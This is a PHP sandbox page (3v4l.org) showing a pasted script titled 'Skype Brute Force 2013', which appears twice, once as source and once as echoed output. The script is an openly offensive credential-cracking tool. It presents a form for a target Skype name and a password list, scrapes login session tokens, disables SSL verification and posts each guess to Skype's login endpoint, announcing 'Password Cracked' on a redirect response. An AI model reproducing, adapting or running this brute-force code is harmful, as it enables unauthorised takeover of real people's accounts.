3v4l.org

run code in 300+ PHP versions simultaneously
<form method='POST'> <title>Skype Brute Force 2013 By archavin</title> <center> <img src='http://www.promusicacademy.com/wp-content/uploads/2012/11/Skype-icon.png'><br> <input type='text' name='skypename' placeholder='Skype Name' size='38'><br> <textarea rows='16' cols='38' name='passwords' placeholder='passwords'></textarea><br> <input type='submit' value='Start Brute' name='brute'><br> </center> </form> <? @set_time_limit(0); # Brute Force Skype PHP Version # Coded By : xSecurity # Greets To : (( Sec4ever.CoM )) - (( x3 Group )) - (( is-sec.CoM )) $skype = "https://login.skype.com/login?application=account&return_url=https%3A%2F%2Fsecure.skype.com%2Faccount%2Flogin"; # Username & Password $username = $_POST['skypename']; $password = explode("\r\n", $_POST['passwords']); # time zone $time = date_default_timezone_set("Asia/Riyadh"); $date = date('H:i:s'); //Returns IST # header $header = "HTTP/1.1 302"; # Fucntion Detalis function xsecurity($skype) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $skype); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch,CURLOPT_COOKIEJAR, getcwd()."./cookie.txt"); curl_setopt($ch,CURLOPT_COOKIEFILE, getcwd()."./cookie.txt"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $run = curl_exec($ch); preg_match('/<input type="hidden" name="session_token" value="(.*?)"/', $run, $hash); preg_match('/<input type="hidden" name="pie" id="pie" value="(.*?)"/', $run, $piie); preg_match('/<input type="hidden" name="etm" id="etm" value="(.*?)"/', $run, $etmm); return $hash[1]."|:|".$piie[1]."|:|".$etmm[1]; } # Explode Detalis $xsec = explode("|:|" ,xsecurity($skype)); $token = $xsec[0]; $pie = $xsec[1]; $etm = $xsec[2]; # Function Brute function brute($skype,$username,$pass,$header) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $skype); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, "username={$username}&password={$pass}&timezone_field=%2B03%7C00&pie={$pie}&etm={$etm}&js_time={$date}&session_token={$token}&application=account&return_url=https%3A%2F%2Fsecure.skype.com%2Faccount%2Flogin"); curl_setopt($ch,CURLOPT_COOKIEJAR, getcwd()."./cookie.txt"); curl_setopt($ch,CURLOPT_COOKIEFILE, getcwd()."./cookie.txt"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $brute = curl_exec($ch); if(strstr($brute, $header)) { echo "<font face='Tahoma' size='2'><center>[+] Password Cracked is <b>{$pass}</b> --> <b>{$username}</b></font></center>"; } return $brute; } if($_POST['brute']) { foreach($password as $pass) { brute($skype,$username,$pass,$header); } } echo "<center><br><font face='Tahoma' size='5' color='red'>Coded By : archavin cyberizm.org</font></center>"; ?>
Output for git.master, git.master_jit, rfc.property-hooks
<form method='POST'> <title>Skype Brute Force 2013 By archavin</title> <center> <img src='http://www.promusicacademy.com/wp-content/uploads/2012/11/Skype-icon.png'><br> <input type='text' name='skypename' placeholder='Skype Name' size='38'><br> <textarea rows='16' cols='38' name='passwords' placeholder='passwords'></textarea><br> <input type='submit' value='Start Brute' name='brute'><br> </center> </form> <? @set_time_limit(0); # Brute Force Skype PHP Version # Coded By : xSecurity # Greets To : (( Sec4ever.CoM )) - (( x3 Group )) - (( is-sec.CoM )) $skype = "https://login.skype.com/login?application=account&return_url=https%3A%2F%2Fsecure.skype.com%2Faccount%2Flogin"; # Username & Password $username = $_POST['skypename']; $password = explode("\r\n", $_POST['passwords']); # time zone $time = date_default_timezone_set("Asia/Riyadh"); $date = date('H:i:s'); //Returns IST # header $header = "HTTP/1.1 302"; # Fucntion Detalis function xsecurity($skype) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $skype); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch,CURLOPT_COOKIEJAR, getcwd()."./cookie.txt"); curl_setopt($ch,CURLOPT_COOKIEFILE, getcwd()."./cookie.txt"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $run = curl_exec($ch); preg_match('/<input type="hidden" name="session_token" value="(.*?)"/', $run, $hash); preg_match('/<input type="hidden" name="pie" id="pie" value="(.*?)"/', $run, $piie); preg_match('/<input type="hidden" name="etm" id="etm" value="(.*?)"/', $run, $etmm); return $hash[1]."|:|".$piie[1]."|:|".$etmm[1]; } # Explode Detalis $xsec = explode("|:|" ,xsecurity($skype)); $token = $xsec[0]; $pie = $xsec[1]; $etm = $xsec[2]; # Function Brute function brute($skype,$username,$pass,$header) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $skype); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, "username={$username}&password={$pass}&timezone_field=%2B03%7C00&pie={$pie}&etm={$etm}&js_time={$date}&session_token={$token}&application=account&return_url=https%3A%2F%2Fsecure.skype.com%2Faccount%2Flogin"); curl_setopt($ch,CURLOPT_COOKIEJAR, getcwd()."./cookie.txt"); curl_setopt($ch,CURLOPT_COOKIEFILE, getcwd()."./cookie.txt"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $brute = curl_exec($ch); if(strstr($brute, $header)) { echo "<font face='Tahoma' size='2'><center>[+] Password Cracked is <b>{$pass}</b> --> <b>{$username}</b></font></center>"; } return $brute; } if($_POST['brute']) { foreach($password as $pass) { brute($skype,$username,$pass,$header); } } echo "<center><br><font face='Tahoma' size='5' color='red'>Coded By : archavin cyberizm.org</font></center>"; ?>

This tab shows result from various feature-branches currently under review by the php developers. Contact me to have additional branches featured.

Active branches

Archived branches

Once feature-branches are merged or declined, they are no longer available. Their functionality (when merged) can be viewed from the main output page


preferences:
59.08 ms | 409 KiB | 8 Q